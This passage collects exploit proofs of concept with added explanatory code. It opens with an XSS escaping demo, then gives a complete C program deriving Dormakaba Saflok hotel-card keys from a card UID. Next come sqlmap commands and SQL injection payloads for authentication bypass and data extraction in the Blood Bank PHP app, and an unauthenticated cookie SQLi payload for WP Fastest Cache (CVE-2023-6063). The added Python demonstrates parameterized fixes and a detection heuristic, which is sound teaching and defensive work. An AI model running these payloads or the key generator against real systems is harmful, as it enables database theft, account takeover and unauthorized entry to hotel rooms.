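def render_escaped(secretkey: str) -> str:
    """Encode &, <, >, " and ' so the browser sees one attribute value, not new markup."""
    return TEMPLATE.format(value=html.escape(secretkey, quote=True))


class _TagCollector(HTMLParser):
    """Records start tags and the value attribute of the input element."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.input_value: Optional[str] = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def inspect(markup: str) -> Tuple[List[str], Optional[str]]:
    """Parse the rendered HTML as a browser would and report (tags, input value)."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags, p.input_value


if __name__ == "__main__":
    for label, markup in (("unsafe", render_unsafe(PAYLOAD)), ("escaped", render_escaped(PAYLOAD))):
        tags, value = inspect(markup)
        print(f"{label:8} tags={tags} value={value!r}")
```

In the unsafe rendering the parser sees a second element (`h1`) carrying an `onclick` handler and the input's value is cut to the empty string; in the escaped rendering there is one element and the attribute holds the full stored string, which the parser decodes back to the original payload. Escaping belongs at output time, in every place the setting is echoed, rather than at save time, since the same stored value may later be emitted into other contexts.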
<pre><code>// Exploit Title: Saflok KDF<br />// Date: 2023-10-29<br />// Exploit Author: a51199deefa2c2520cea24f746d899ce<br />// Vendor Homepage: https://www.dormakaba.com/<br />// Version: System 6000<br />// Tested on: Dormakaba Saflok cards<br />// CVE: N/A<br /><br />#include <stdio.h><br />#include <stdint.h><br /><br />#define MAGIC_TABLE_SIZE 192<br />#define KEY_LENGTH 6<br />#define UID_LENGTH 4<br /><br />int main(int argc, char *argv[]) {<br /> if (argc != 2) {<br /> printf("Usage: %s <32-bit uid value in hexadecimal format>\n", argv[0]);<br /> return 1;<br /> }<br /><br /> uint8_t magic_table[MAGIC_TABLE_SIZE] = {<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xF0, 0x57, 0xB3, 0x9E, 0xE3, 0xD8,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x96, 0x9D, 0x95, 0x4A, 0xC1, 0x57,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x43, 0x58, 0x0D, 0x2C, 0x9D,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFF, 0xCC, 0xE0, 0x05, 0x0C, 0x43,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x34, 0x1B, 0x15, 0xA6, 0x90, 0xCC,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x89, 0x58, 0x56, 0x12, 0xE7, 0x1B,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xBB, 0x74, 0xB0, 0x95, 0x36, 0x58,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFB, 0x97, 0xF8, 0x4B, 0x5B, 0x74,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xC9, 0xD1, 0x88, 0x35, 0x9F, 0x92,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x92, 0xE9, 0x7F, 0x58, 0x97,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x16, 0x6C, 0xA2, 0xB0, 0x9F, 0xD1,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x27, 0xDD, 0x93, 0x10, 0x1C, 0x6C,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xDA, 0x3E, 0x3F, 0xD6, 0x49, 0xDD,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x58, 0xDD, 0xED, 0x07, 0x8E, 0x3E,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x5C, 0xD0, 0x05, 0xCF, 0xD9, 0x07,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x11, 0x8D, 0xD0, 0x01, 0x87, 0xD0<br /> };<br /><br /> uint8_t uid[UID_LENGTH];<br /> sscanf(argv[1], "%2hhx%2hhx%2hhx%2hhx", &uid[0], &uid[1], 
&uid[2], &uid[3]);<br /><br /> uint8_t magic_byte = (uid[3] >> 4) + (uid[2] >> 4) + (uid[0] & 0x0F);<br /> uint8_t magickal_index = (magic_byte & 0x0F) * 12 + 11;<br /><br /> uint8_t key[KEY_LENGTH] = {magic_byte, uid[0], uid[1], uid[2], uid[3], magic_byte};<br /> uint8_t carry_sum = 0;<br /><br /> /* magickal_index is unsigned, so a "magickal_index >= 0" test on it is always true (compilers warn).<br /> The loop is bounded by i alone: the index starts at 11 or more and is used for six consecutive<br /> values, all inside magic_table. */<br /> for (int i = KEY_LENGTH - 1; i >= 0; i--, magickal_index--) {<br /> uint16_t keysum = key[i] + magic_table[magickal_index];<br /> key[i] = (keysum & 0xFF) + carry_sum;<br /> carry_sum = keysum >> 8;<br /> }<br /><br /> printf("Generated Key: ");<br /> for (int i = 0; i < KEY_LENGTH; i++) {<br /> printf("%02X", key[i]);<br /> }<br /> printf("\n");<br /><br /> return 0;<br />}<br /></code></pre>
<pre><code># Exploit Title: Blood Bank v1.0 SQL Injection Vulnerability<br /># Date: 2023-11-14<br /># Exploit Author: Ersin Erenler<br /># Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code<br /># Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip<br /># Version: 1.0<br /># Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0<br /># CVE : CVE-2023-46014, CVE-2023-46017, CVE-2023-46018<br /><br />-------------------------------------------------------------------------------<br /><br />1. Description:<br /><br />The lack of proper input validation and sanitization on the 'hemail' and 'hpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.<br /><br />Vulnerable File: /hospitalLogin.php<br /><br />Parameter Names: hemail, hpassword<br /><br />2. Proof of Concept:<br />----------------------<br /><br />Execute sqlmap using either the 'hemail' or 'hpassword' parameter to retrieve the current database:<br /><br />sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p hemail --risk 3 --level 3 --dbms mysql --batch --current-db<br /><br />SQLMap Response:<br />----------------------<br />Parameter: hemail (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- 
NSQu&hpassword=test&hlogin=Login<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 6 columns<br /> Payload: hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login<br /><br /><br />-------------------------------------------------------------------------------<br /><br />1. Description:<br /><br />The lack of proper input validation and sanitization on the 'remail' and 'rpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database<br /><br />Vulnerable File: /receiverLogin.php<br /><br />Parameter Names: remail, rpassword<br /><br />2. 
Proof of Concept:<br />----------------------<br /><br />Execute sqlmap against the receiver login form using either the 'remail' or the 'rpassword' parameter to retrieve the current database (both parameters travel in the same POST body, so the two commands differ only in -p):<br /><br />sqlmap -u "http://localhost/bloodbank/file/receiverLogin.php" --method POST --data "remail=test@test&rpassword=test&rlogin=Login" -p remail --risk 3 --level 5 --dbms mysql --batch --current-db<br /><br />sqlmap -u "http://localhost/bloodbank/file/receiverLogin.php" --method POST --data "remail=test@test&rpassword=test&rlogin=Login" -p rpassword --risk 3 --level 5 --dbms mysql --batch --current-db<br /><br />SQLMap Response:<br />----------------------<br />---<br />Parameter: remail (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9644=9644,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyEh&rpassword=test&rlogin=Login<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: remail=test@test' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))hWQj)-- NUfN&rpassword=test&rlogin=Login<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 7 columns<br /> Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4e764e5452486270544a6e4c705a79535a667441756d556b416e7961484a534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login<br />---<br />---<br />Parameter: rpassword (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(6087=6087,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VRqW&rlogin=Login<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: remail=test@test&rpassword=test' AND (SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy&rlogin=Login<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 7 columns<br /> Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d776376736a706f47796d474a736a48566f72625a4e6d537247665a444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login<br />---<br /><br />The time-based payloads delay the response by 5 seconds, and the UNION payloads show that the login query returns 7 columns, which is what lets data be read back in the page rather than only blind.<br /><br />-------------------------------------------------------------------------------<br /><br /># Description:<br /><br />The 'remail' parameter of the receiver registration form is placed into a SQL query without validation or escaping, the same pattern as the login forms above. An attacker can inject arbitrary SQL through it and gain unauthorized access to the database.<br /><br />Vulnerable File: /receiverReg.php<br /><br />Parameter Name: remail<br /><br /># Proof of Concept:<br />----------------------<br /><br />1. Save the POST request of receiverReg.php to a request.txt file (the form is submitted as multipart/form-data, which sqlmap -r parses; substitute your own PHPSESSID value):<br /><br />---<br />POST /bloodbank/file/receiverReg.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868<br />Content-Length: 877<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/bloodbank/register.php<br />Cookie: PHPSESSID=<some-cookie-value><br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="rname"<br /><br />test<br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="rbg"<br /><br />A+<br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="rcity"<br /><br />test<br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="rphone"<br /><br />05555555555<br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="remail"<br /><br />test@test<br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="rpassword"<br /><br />test123<br />-----------------------------2653697510272605730288393868<br />Content-Disposition: form-data; name="rregister"<br /><br />Register<br />-----------------------------2653697510272605730288393868--<br /><br />---<br /><br />2. Execute sqlmap on the 'remail' parameter of the saved request to retrieve the current database:<br /><br />sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db<br /><br /></code></pre>
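Neither Blood Bank proof of concept above shows the application's own query, only what sqlmap found in it. The following Python is an added example, not code from the Blood Bank project: it builds the login query by string interpolation, the pattern behind every finding on this page, and runs the injection shapes the advisory relies on (the authentication bypass the description mentions, a UNION read-back like sqlmap's "Generic UNION query" finding, and a boolean-based blind probe) against an in-memory SQLite table, next to the parameterized fix. The table and column names (receiver, remail, rpassword) are assumed, and SQLite stands in for MySQL, so the MySQL-only SLEEP() and FLOOR(RAND()) payloads from the output are not reproduced.

```python
import sqlite3

# Added example, not the Blood Bank application's code. The page shows only the
# sqlmap side, so the table and column names (receiver, remail, rpassword) are
# assumed; SQLite stands in for MySQL, so MySQL-only techniques from the sqlmap
# output (SLEEP(), the FLOOR(RAND()) error trick) are not reproduced.


def make_db():
    """In-memory stand-in for the receiver table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE receiver (id INTEGER PRIMARY KEY, remail TEXT, rpassword TEXT)"
    )
    conn.execute(
        "INSERT INTO receiver (remail, rpassword) VALUES ('alice@example.org', 'S3cret!')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, remail, rpassword):
    """The pattern the advisories describe: user input spliced into the SQL text."""
    sql = f"SELECT id FROM receiver WHERE remail = '{remail}' AND rpassword = '{rpassword}'"
    return conn.execute(sql).fetchone()


def login_safe(conn, remail, rpassword):
    """Fix: bind parameters, so the input can only ever be a value, never syntax."""
    sql = "SELECT id FROM receiver WHERE remail = ? AND rpassword = ?"
    return conn.execute(sql, (remail, rpassword)).fetchone()


def demo():
    """Run each injection shape through both versions and collect the results."""
    conn = make_db()
    # 1. Authentication bypass: close the literal, then comment out the password check.
    bypass = "alice@example.org'-- -"
    # 2. UNION read-back, the shape of sqlmap's "Generic UNION query" finding: the
    #    injected SELECT must match the original column count (one column here).
    union = "x' UNION SELECT rpassword FROM receiver-- -"
    # 3. Boolean-based blind: a true and a false condition give different responses.
    blind_true = "alice@example.org' AND 1=1-- -"
    blind_false = "alice@example.org' AND 1=2-- -"
    return {
        "bypass_vulnerable": login_vulnerable(conn, bypass, "wrong"),
        "bypass_safe": login_safe(conn, bypass, "wrong"),
        "union_vulnerable": login_vulnerable(conn, union, "wrong"),
        "union_safe": login_safe(conn, union, "wrong"),
        "blind_true": login_vulnerable(conn, blind_true, "wrong") is not None,
        "blind_false": login_vulnerable(conn, blind_false, "wrong") is not None,
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:18} -> {result!r}")
```

With the interpolated query the bypass payload logs in as alice with a wrong password, the UNION payload returns her stored password in the id column, and the true/false probes are distinguishable, which is all sqlmap needs for blind extraction. The parameterized version returns nothing for the same inputs, because the quote and the comment marker are just characters inside a bound value.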
<pre><code># Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache < 1.2.2<br /># Date: 14.11.2023<br /># Exploit Author: Meryem Taşkın<br /># Vendor Homepage: https://www.wpfastestcache.com/<br /># Software Link: https://wordpress.org/plugins/wp-fastest-cache/<br /># Version: WP Fastest Cache < 1.2.2 (fixed in 1.2.2)<br /># Tested on: WordPress with a vulnerable (pre-1.2.2) WP Fastest Cache<br /># CVE: CVE-2023-6063<br /><br />## Description<br />WP Fastest Cache versions before 1.2.2 contain an SQL injection in the plugin's is_user_admin() check: the username is taken from any cookie whose name contains "wordpress_logged_in" and placed into a query without escaping. No authentication is required, because the cookie is attacker-supplied and never validated before the query runs. The fix shipped in 1.2.2 (see the WPScan references below).<br /><br />## Vuln Code<br /><br />public function is_user_admin(){<br />    global $wpdb;<br />    foreach ((array)$_COOKIE as $cookie_key => $cookie_value){<br />        if(preg_match("/wordpress_logged_in/i", $cookie_key)){<br />            $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);<br />            break;<br />        }<br />    }<br />    if(isset($username) && $username){<br />        $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`<br />            FROM `$wpdb->users`<br />            INNER JOIN `$wpdb->usermeta`<br />            ON `$wpdb->users`.`user_login` = \"$username\" AND # $username variable is not escaped: vulnerable to SQL injection<br />            .....<br /><br />## Exploit<br />GET / HTTP/1.1<br />Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221<br />Host: meryem.local<br /><br />URL-decoded, the cookie value is " AND (SELECT 1 FROM (SELECT(SLEEP(5))A) AND "1"="1. It contains no '|', so the preg_replace() leaves it unchanged and the whole value is spliced into the double-quoted string literal in the query; a response delayed by about five seconds confirms the injection. Any cookie name containing "wordpress_logged_in" is accepted, as the sqlmap payload below shows.<br /><br />## sqlmap Output<br />---<br />Parameter: Cookie #1* ((custom) HEADER)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg<br />---<br /><br />## References<br />- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)<br />- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)<br />- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063)<br /><br />## Credits<br />- Original Researcher: Alex Sanford<br />- PoC: Meryem Taşkın<br /><br /></code></pre>
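The cookie handling in is_user_admin() is the whole bug: the username is whatever precedes the first '|' in the first matching cookie, and a value without a '|' passes through untouched. The following Python is an added example, not the plugin's code. It re-implements that extraction (same regexes as the PHP), renders the query text the plugin would build so the injection point is visible, and adds a detection check over Cookie headers that flags login cookies whose username field carries quotes or SQL keywords. The header samples are constructed (the second one is the advisory's own PoC cookie), and the wp_ table prefix in the rendered query is an assumption.

```python
import re
from urllib.parse import unquote

# Added example, not the plugin's code. Mirrors the cookie handling shown in
# is_user_admin() above (first cookie whose name contains "wordpress_logged_in",
# keep everything before the first '|') and adds a detection check on the
# extracted username. The Cookie headers below are constructed samples.
COOKIE_NAME_RE = re.compile(r"wordpress_logged_in", re.IGNORECASE)
USERNAME_RE = re.compile(r"^([^|]+)\|.+")  # preg_replace("/^([^\|]+)\|.+/", "$1", ...)

# Abbreviated shape of the plugin's query; the wp_ prefix is assumed ($wpdb->users).
QUERY_TEMPLATE = (
    "SELECT wp_users.ID, wp_users.user_login, wp_usermeta.meta_key, wp_usermeta.meta_value "
    'FROM wp_users INNER JOIN wp_usermeta ON wp_users.user_login = "{username}" AND ...'
)

# Heuristic: a real user_login never needs a quote, and SQL keywords or comment
# markers in the username field mean someone is probing the query, not logging in.
SQL_HINT_RE = re.compile(
    r"""["']|\bSLEEP\s*\(|\bBENCHMARK\s*\(|\bUNION\b|\bSELECT\b|--|/\*""", re.IGNORECASE
)


def parse_cookie_header(header):
    """Split a Cookie: header into (name, value) pairs, URL-decoding values as PHP does for $_COOKIE."""
    pairs = []
    for part in header.split(";"):
        part = part.strip()
        if "=" in part:
            name, value = part.split("=", 1)
            pairs.append((name.strip(), unquote(value)))
    return pairs


def extract_username(header):
    """What the plugin puts into the query, or None when no login cookie is present."""
    for name, value in parse_cookie_header(header):
        if COOKIE_NAME_RE.search(name):
            # With no '|' in the value the pattern does not match and the whole value survives.
            return USERNAME_RE.sub(r"\1", value)
    return None


def render_query(username):
    """The SQL text the plugin would build for this username (the real query continues after AND)."""
    return QUERY_TEMPLATE.format(username=username)


def classify(header):
    """Detection verdict for one request's Cookie header."""
    username = extract_username(header)
    if username is None:
        return "no-login-cookie"
    return "sqli-probe" if SQL_HINT_RE.search(username) else "ok"


SAMPLE_HEADERS = [
    # constructed: the shape of a genuine auth cookie, user_login|expiration|token|hmac
    "wordpress_logged_in_3f2a=admin%7C1700000000%7CabcdefToken%7Cdeadbeef; wp-settings-1=editor%3Dhtml",
    # the advisory's PoC cookie, verbatim
    "wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221",
    # constructed: no login cookie at all, so the plugin never builds the query
    "PHPSESSID=abc123; wordpress_test_cookie=WP%20Cookie%20check",
]

if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        user = extract_username(header)
        print(classify(header), repr(user))
        if user is not None:
            print("   ", render_query(user))
```

For the genuine cookie the rendered query carries user_login = "admin"; for the PoC cookie it carries user_login = "" AND (SELECT 1 FROM (SELECT(SLEEP(5))A) AND "1"="1" AND ..., which is exactly the time-based probe sqlmap reports. The plugin-side fix is to pass the username through $wpdb->prepare() (or esc_sql()) instead of interpolating it; the detection rule above is what to run over access logs or a WAF cookie inspection to find attempts against unpatched sites.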